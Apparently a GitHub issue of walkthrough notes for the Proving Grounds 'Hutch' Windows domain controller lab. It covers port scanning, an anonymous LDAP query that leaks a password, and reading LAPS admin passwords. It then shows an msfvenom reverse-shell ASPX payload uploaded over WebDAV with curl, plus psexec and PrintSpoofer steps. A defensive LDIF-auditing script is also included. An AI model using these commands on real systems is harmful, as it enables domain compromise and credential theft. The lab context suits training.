WDavid404 / PG-Box

PG box walkthrough notes

Hutch (Intermediate, Windows) - ldap #47

Open WDavid404 opened 3 months ago

WDavid404 commented 3 months ago

Keypoints: ldap

WDavid404 commented 3 months ago
PORT      STATE SERVICE       REASON          VERSION
53/tcp    open  domain        syn-ack ttl 125 Simple DNS Plus
80/tcp    open  http          syn-ack ttl 125 Microsoft IIS httpd 10.0
88/tcp    open  kerberos-sec  syn-ack ttl 125 Microsoft Windows Kerberos (server time: 2024-08-03 03:13:18Z)
135/tcp   open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 125 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 125 Microsoft Windows Active Directory LDAP (Domain: hutch.offsec0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack ttl 125
464/tcp   open  kpasswd5?     syn-ack ttl 125
593/tcp   open  ncacn_http    syn-ack ttl 125 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped    syn-ack ttl 125
3268/tcp  open  ldap          syn-ack ttl 125 Microsoft Windows Active Directory LDAP (Domain: hutch.offsec0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack ttl 125
5985/tcp  open  http          syn-ack ttl 125 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp  open  mc-nmf        syn-ack ttl 125 .NET Message Framing
49666/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49668/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49673/tcp open  ncacn_http    syn-ack ttl 125 Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49676/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49692/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49878/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC

80/tcp feroxbuster -u http://192.168.241.122 -k -C 404,503,502 --> no useful info

139/tcp crackmapexec smb 192.168.241.122 --shares --> SMB 192.168.241.122 445 HUTCHDC [*] Windows 10.0 Build 17763 x64 (name:HUTCHDC) (domain:hutch.offsec) (signing:True) (SMBv1:False)

smbclient --no-pass //hutch.offsec/HUTCHDC/ --->

Anonymous login successful
tree connect failed: NT_STATUS_BAD_NETWORK_NAME

389/tcp (LDAP) nmap -->

389/tcp open  ldap    syn-ack ttl 125 Microsoft Windows Active Directory LDAP (Domain: hutch.offsec, Site: Default-First-Site-Name)
| ldap-rootdse: 
| LDAP Results
|   <ROOT>
|       domainFunctionality: 7
|       forestFunctionality: 7
|       domainControllerFunctionality: 7
|       rootDomainNamingContext: DC=hutch,DC=offsec
|       ldapServiceName: hutch.offsec:hutchdc$@HUTCH.OFFSEC
|       isGlobalCatalogReady: TRUE
|       supportedSASLMechanisms: GSSAPI
|       supportedSASLMechanisms: GSS-SPNEGO
|       supportedSASLMechanisms: EXTERNAL
|       supportedSASLMechanisms: DIGEST-MD5
.....

ldapsearch -H ldap://192.168.241.122 -x -s base namingcontexts

ldapsearch -x -H ldap://192.168.241.122 -D '' -w '' -b "DC=hutch,DC=offsec" [image] ---> fmcsorley:CrabSharkJellyfish192

crackmapexec smb 192.168.241.122 --shares -u fmcsorley -p CrabSharkJellyfish192 [image]

smbclient //hutch.offsec/NETLOGON --user fmcsorley%CrabSharkJellyfish192 --> failed

ldapsearch -x -H ldap://192.168.241.122 -D 'hutch\fmcsorley' -w 'CrabSharkJellyfish192' -b 'dc=hutch,dc=offsec' "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd [image]

impacket-psexec "HUTCH/Administrator@192.168.241.122" [image]
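Defender-side counterpart to the two LDAP findings above (an anonymous bind that exposes a credential, and a low-privileged account that can read ms-Mcs-AdmPwd). This is an added example, not code from the PG-Box repo or from the tools it lists: it parses an LDIF export such as ldapsearch writes and flags both conditions so an AD admin can audit their own directory. The notes do not say which attribute held the leaked password, so scanning description/info/comment is an assumption, and the LDIF below is constructed sample data rather than output from the lab host.

```python
"""Audit an LDIF export for secrets a low-privileged bind can read.

Added example (not from the PG-Box notes). Two findings:
  1. password-looking text in free-text attributes (description, info,
     comment) -- which attribute leaked on the box is not stated, so
     this attribute list is an assumption;
  2. an ms-Mcs-AdmPwd value present in the export, meaning the account
     used for the bind can read LAPS local administrator passwords.
SAMPLE_LDIF is constructed data, not a capture from any real host.
"""
import re

# Free-text attributes that admins commonly (mis)use to park credentials.
FREE_TEXT_ATTRS = ("description", "info", "comment")
# Heuristic: a non-space run of 8+ chars containing both a letter and a digit.
PASSWORD_LIKE = re.compile(r"(?=\S*[A-Za-z])(?=\S*\d)\S{8,}")
# Words that usually accompany a stored credential.
CRED_HINT = re.compile(r"(?i)\b(pass(word)?|pwd|cred)")
LAPS_ATTR = "ms-mcs-admpwd"

SAMPLE_LDIF = """\
dn: CN=Alice Example,CN=Users,DC=example,DC=test
objectClass: user
sAMAccountName: aexample
description: Temp password: Winter2024!Reset

dn: CN=Bob Example,CN=Users,DC=example,DC=test
objectClass: user
sAMAccountName: bexample
description: Helpdesk analyst, 2nd floor

dn: CN=WS01,OU=Workstations,DC=example,DC=test
objectClass: computer
sAMAccountName: WS01$
ms-Mcs-AdmPwd: x7Q!pl2Rv9Zs
ms-Mcs-AdmPwdExpirationTime: 133650000000000000
"""


def parse_ldif(text):
    """Return a list of {attr(lowercased): [values]} dicts, one per entry.

    Handles blank-line entry separators, '#' comments and LDIF line
    continuation (a leading space joins onto the previous value).
    """
    entries, current, last_attr = [], {}, None
    for raw in text.splitlines():
        if raw.startswith("#"):
            continue
        if not raw.strip():
            if current:
                entries.append(current)
            current, last_attr = {}, None
            continue
        if raw.startswith(" ") and last_attr is not None:
            current[last_attr][-1] += raw[1:]
            continue
        attr, _, value = raw.partition(":")
        attr = attr.strip().lower()
        current.setdefault(attr, []).append(value.lstrip())
        last_attr = attr
    if current:
        entries.append(current)
    return entries


def audit(text):
    """Return (dn, finding) tuples for every exposed secret in the export."""
    findings = []
    for entry in parse_ldif(text):
        dn = entry.get("dn", ["?"])[0]
        for attr in FREE_TEXT_ATTRS:
            for value in entry.get(attr, []):
                if CRED_HINT.search(value) or PASSWORD_LIKE.search(value):
                    findings.append((dn, f"credential-like text in {attr}"))
        if entry.get(LAPS_ATTR):
            findings.append((dn, "LAPS password readable by this bind"))
    return findings


if __name__ == "__main__":
    for dn, finding in audit(SAMPLE_LDIF):
        print(f"{finding}: {dn}")
```

Run it against an export taken with the identity you want to check (anonymous, then an ordinary domain user); any LAPS finding means that identity holds read rights on ms-Mcs-AdmPwd and the ACL on the computer OU needs fixing, while description hits are cleaned up by rotating the credential and removing the text.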

WDavid404 commented 3 months ago

Another method

Nikto for 80/tcp [image] --> webdav is enabled.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.205 LPORT=80 --platform Windows -a x64 -f aspx -o shell.aspx

curl -T '/home/kali/shell.aspx' 'http://192.168.241.122/' -u fmcsorley:CrabSharkJellyfish192
## -T , --upload-file

Browsing to 192.168.241.122/shell.aspx --> Got a reverse shell

See https://juggernaut-sec.com/proving-grounds-hutch/

[image] Unfortunately, due to this being a Server 2019 machine we will not be able to utilize a Potato attack; however, this version of Windows Server is vulnerable to PrintSpoofer! [image]